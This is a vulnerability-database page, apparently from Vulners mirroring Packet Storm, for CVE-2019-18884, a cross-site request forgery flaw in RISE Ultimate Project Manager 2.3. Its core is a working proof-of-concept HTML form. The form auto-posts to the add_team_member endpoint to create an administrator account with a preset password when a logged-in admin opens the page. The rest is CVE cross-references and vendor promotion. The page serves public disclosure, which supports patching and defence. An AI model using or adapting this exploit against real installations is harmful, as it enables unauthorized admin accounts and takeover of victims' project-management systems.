Lucene search
K

RISE Ultimate Project Manager 2.3 Cross Site Request Forgery

🗓️ 12 Nov 2019 00:00:00Reported by Ismail TasdelenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 160 Views

Rise Ultimate Project Manager v2.3 CSRF Add Admi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-18884
13 Feb 202415:36
circl
CNVD
RISE Ultimate Project Manager Cross-Site Request Forgery Vulnerability
14 Nov 201900:00
cnvd
CVE
CVE-2019-18884
13 Nov 201919:51
cve
Cvelist
CVE-2019-18884
13 Nov 201919:51
cvelist
EUVD
EUVD-2019-8572
7 Oct 202500:30
euvd
NVD
CVE-2019-18884
13 Nov 201920:15
nvd
Prion
Cross site request forgery (csrf)
13 Nov 201920:15
prion
RedhatCVE
CVE-2019-18884
9 Jan 202610:18
redhatcve
`# Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)  
# Date: 11-11-2019  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: http://fairsketch.com/  
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641  
# Software : RISE - Ultimate Project Manager  
# Product Version: Version 2.3  
# Vulernability Type : Cross-Site Request Forgery  
# Vulenrability : Cross-Site Request Forgery (Add Admin)  
# CVE : CVE-2019-18884  
  
# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 has CSRF for adding authorized users.  
  
# CSRF PoC :  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">  
<input type="hidden" name="first_name" value="Ismail" />  
<input type="hidden" name="last_name" value="Tasdelen" />  
<input type="hidden" name="address" value="[email protected]" />  
<input type="hidden" name="phone" value="+12345678975" />  
<input type="hidden" name="gender" value="male" />  
<input type="hidden" name="job_title" value="Security Researcher" />  
<input type="hidden" name="salary" value="100000" />  
<input type="hidden" name="salary_term" value="12" />  
<input type="hidden" name="date_of_hire" value="2019-11-11" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="password" value="iQ.grF10" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="email_login_details" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.00659
160